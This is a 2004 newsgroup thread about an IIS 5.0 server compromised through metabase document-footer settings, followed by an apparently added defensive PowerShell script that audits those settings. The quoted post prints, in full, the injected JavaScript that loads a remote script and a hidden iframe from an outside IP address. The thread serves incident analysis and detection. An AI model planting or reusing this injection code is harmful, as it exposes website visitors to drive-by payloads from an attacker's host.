Re: Russian IIS hack? Malicious Javascript code

From: Paul Lynch (paul.lynch_at_nospam.com)
Date: 06/23/04

  • Next message: Nathan Henderson: "Setting up a web site"
    Date: Wed, 23 Jun 2004 02:28:40 +0100

    On Tue, 22 Jun 2004 17:42:01 -0700, Oca Hoeflein <Oca
    Hoeflein@discussions.microsoft.com> wrote:

    >I successfully removed some malicious code from my IIS 5.0 server that may not have had all its patches updated, but I cannot find any information on this malicious code that redirected on a random basis the users of my websites to a Russian website that appeared to be down, a domain called balamut.com
    >with an IP address of 217.107.218.147 which RDNS to
    >unassigned.m10-msk-ru.e-neverland.net
    >
    >The javascript code lived in some fake dll files in the inetsrv folder.
    >One fake .dll file was created for each web on my server and in the IIS metabase the defaultdocfooter was set to each of the dll files and enabledocfooter was set to true.
    >
    >The offending code was embedded in every file that the website delivered, and on pages that had embedded .js files the JavaScript for those pages would not function.
    >
    >I have posted the offending code, maybe someone can identify this?
    >
    >As proof, check out a Google search for one of the functions in the code, okx12().
    >
    >You'll see the first link it returns is an RTF; if you view the HTML version, you'll see this code appended to the bottom of the page.
    >
    ><script language="JavaScript"><!--
    >// Cookie helpers: gc099 reads a cookie by name, sc088 sets one that expires
    >// 600000 ms (10 minutes) after it is written
    >var qxco7=document.cookie;
    >function gc099(n21){
    >  var ix=qxco7.indexOf(n21+"=");
    >  if(ix==-1)return null;
    >  ix=qxco7.indexOf("=",ix)+1;
    >  var es=qxco7.indexOf(";",ix);
    >  if(es==-1)es=qxco7.length;
    >  return unescape(qxco7.substring(ix,es));
    >}
    >function sc088(n24,v8){
    >  var today=new Date();
    >  var expiry=new Date(today.getTime()+600000);
    >  if(v8!=null&&v8!="")document.cookie=n24+"="+escape(v8)+"; expires="+expiry.toGMTString();
    >  qxco7=document.cookie;
    >}
    >// Blank the browser status bar every 200 ms so the injected URL is not shown
    >function okx12(){window.status="";setTimeout("okx12()", 200);}
    >okx12();
    >// Only on plain-HTTP pages, and only once per 10 minutes per browser (cookie
    >// trk716): load a remote script and a 1x1 iframe from 217.107.218.147/dot.php
    >if(location.href.indexOf("https")!=0){
    >  if(gc099("trk716")==null){
    >    document.write("<script language=\"JavaScript\" src=\"http://217.107.218.147/dot.php\"></script><iframe src=\"http://217.107.218.147/dot.php\" height=\"1\" width=\"1\" scrolling=\"no\" frameborder=\"no\"/>");
    >    sc088("trk716","4");
    >  }
    >}
    >// --></script>
    >

    You're asking the wrong questions I'm afraid. Instead of trying to
    track down the source of some l33t hAx0r code you should be asking
    yourself 'how did this stuff get onto my server and what can I do to
    secure my server and stop it happening again?'

    I'd suggest you start here :

    http://securityadmin.info/faq.asp#hackerstoc

    Regards,

    Paul Lynch
    MCSE

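The mechanism the original poster describes is IIS's document footer: when EnableDocFooter is true on a metabase node, IIS appends the content named by DefaultDocFooter (a FILE: path or a STRING: literal) to the static files it serves from that node, which is why the script turned up at the bottom of every page. The following is an added example, not code from the thread or from Microsoft, that walks the metabase through the IIS ADSI provider and reports every node with a footer configured, then inspects any FILE: footer for the strings visible in the posted script. It assumes a Windows host with PowerShell 3 or later and the IIS ADSI provider (IIS 6, or IIS 7 and later with the IIS 6 metabase compatibility feature), run elevated on the server; the function names and the $Markers list are this example's own.

```powershell
# Added example (not from the original thread): list every metabase node under
# W3SVC that has a document footer set, the setting the poster found tampered
# with, and inspect any FILE: footer it points at.
# Assumes PowerShell 3+ and the IIS ADSI provider (IIS 6, or IIS 7+ with the
# IIS 6 metabase compatibility feature). Run in an elevated prompt on the server.

# Strings taken from the script quoted in the thread; the list itself is ours.
$Markers = @('okx12', 'trk716', 'dot.php', '217.107.218.147')

function Get-DocFooterSetting {
    param([string]$Path = 'IIS://localhost/W3SVC')

    $node = [ADSI]$Path
    # ADSI hands back the effective (inherited) value, so a footer set on one
    # site is also reported on every node beneath it; the highest node that
    # reports it is where it is actually set.
    $enabled = $node.Properties['EnableDocFooter'].Value
    $footer  = $node.Properties['DefaultDocFooter'].Value

    if ($enabled -or $footer) {
        [pscustomobject]@{
            Node    = $Path
            Enabled = [bool]$enabled
            Footer  = [string]$footer   # 'FILE:<path>' or 'STRING:<markup>'
        }
    }

    # A footer can be set on the service, a site, its Root, any virtual
    # directory, or even a single file node, so recurse through every child.
    foreach ($child in $node.Children) {
        Get-DocFooterSetting -Path "$Path/$($child.Name)"
    }
}

function Test-FooterFile {
    param([string]$FooterValue)

    if ($FooterValue -notmatch '^FILE:(.+)$') { return }
    $file = $Matches[1]
    if (-not (Test-Path -LiteralPath $file)) {
        Write-Host "    footer file is missing: $file"
        return
    }
    $info = Get-Item -LiteralPath $file
    $body = Get-Content -LiteralPath $file -Raw -ErrorAction SilentlyContinue
    Write-Host ("    footer file: {0} ({1} bytes, written {2})" -f $file, $info.Length, $info.LastWriteTime)

    $hits = $Markers | Where-Object { $body -and $body.Contains($_) }
    if ($hits) {
        Write-Host ("    contains strings from the posted script: {0}" -f ($hits -join ', '))
    }
    # A footer living under inetsrv is suspicious on its own, and a real .dll
    # starts with the 'MZ' executable signature, not with HTML or JavaScript.
    if ($file -like '*\inetsrv\*') { Write-Host '    located under inetsrv' }
    if ($file -like '*.dll' -and $body -and -not $body.StartsWith('MZ')) {
        Write-Host '    named .dll but does not start with the MZ header'
    }
}

$findings = @(Get-DocFooterSetting)
if ($findings.Count -eq 0) {
    Write-Host 'No document footer configured anywhere under W3SVC.'
}
foreach ($f in $findings) {
    Write-Host ("{0}`n    EnableDocFooter  = {1}`n    DefaultDocFooter = {2}" -f $f.Node, $f.Enabled, $f.Footer)
    Test-FooterFile -FooterValue $f.Footer
}
```

A legitimate footer is rare enough that every hit deserves a look; a FILE: footer that points at a .dll in inetsrv, as in the thread, is the pattern to clear. Removing the footer settings only undoes the symptom: as Paul says, the metabase was writable to whoever planted it, and that is the question to answer before putting the server back.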
